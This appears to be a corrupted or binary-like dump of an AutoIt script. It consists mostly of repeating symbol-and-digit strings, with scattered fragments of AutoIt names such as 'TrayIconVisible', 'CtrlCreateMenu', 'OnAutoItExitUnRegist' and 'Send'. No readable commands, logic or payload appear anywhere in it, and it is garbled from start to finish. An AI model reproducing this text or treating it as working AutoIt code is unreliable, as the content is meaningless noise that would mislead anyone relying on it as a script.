($1)d($1)d($v)F($R)vπ™∏ØICtrlCreateMenuICt@TrayIconVisible?False?7:9?7:3:9?7:)d($ˇ9?$c)
($v)F($l9?6:0?0?3/1:9?3:1:9?7:9?3:7:9?3:9?7:9?3:9?7:0?7:0:0?1:9?7:9?3:$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:”9?3:9?7:0?7:8?7:9?3:9?60?9?False?7:9?[:3:9?7:)d($≤≤($9?$($l)dv$l)d2(7:9?7:9?3:9?7:0? œ?False?7:9?7:9?7:)d($ˇ9?3?9?33F($l9?6:0?0?3/7:9?3:1:v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:$90[:3:9?7:?3?7:9?3:1:9?7:9?3:9?7:0?7:9?7:9?3:9?7:0? œ¿–?False?7:9?7:3:9?7:)d($ˇ9?$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7,0?7:9?7:9?3:9?70::93:1:9?7:9?3:9?7:0?7:0:0?1:9?7:9?3:$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:9>>>>>>>>>>>Step3:9?7:0?7:0:0?1?3:$c)
($v)F(ASin63+4+:0?0?3/7:9?3:1:9?7:9?3:9?7IconVisible?False?7:9?7:3:9?7:)d($ˇ9?$c)
($v)F($l9?6:0?0?3/1:9?3:1:9?7:9?3:7:9?3:9?7:9?3:9?7:0?7:0:0?1:9?7:9?3:$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:”9?3:9?7:0?7:8?7:9?3:9?60?9?False?7:9?[:3:9?7:)d($≤≤($9?$($l)dv$l)d2(7:9?7:9?3:9?7:0? œ?False?7:9?7:9?7:)d($ˇ9?3?9?33F($l9?6:0?0?3/7:9?3:1:v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?3?7:9?3:1:9?7:9?3:9?7:0?7:9?7:9?3:9?7:0? œ¿–?False?7:9?7:3:9?7:)d($ˇ9?$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7,0?7:9?7:9?3:9?70::93:1:9?7:9?3:9?7:0?7:0:0?1:9?7:9?3:$c)
($v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:9>>>>>>>>>>>Step3:9?7:0?7:0:0?1?3:$c)
($v)F(ASin63+4+:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:9>>>>>>>>>>>>dSend?7:0≈… :œ¿–?False?7:9?7:3:9?7:)d($ˇ9?$c)
OnAutoItExitUnRegist($l9?6:0?0?3/7:9?3:1:v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:$90[:3:9?:0?7:8?7:9?3:9?70:0?60?9?False?7:9>>>>>>>>>>>>dSend?7:0≈… :œ¿–?False?7:9?7:3:9?7:)d($ˇ9?$c)
OnAutoItExitUnRegist($l9?6:0?0?3/7:9?3:1:v)F($l9?6:0?0?3/7:9?3:1:9?7:9?3:9?7:0?7:8?7:9?3:9?70:0?60?9?False?7:$90[:3:9?7:+d($≤≤($9?7:0?7::00?1:9?7∆∆¿”:$c)vF?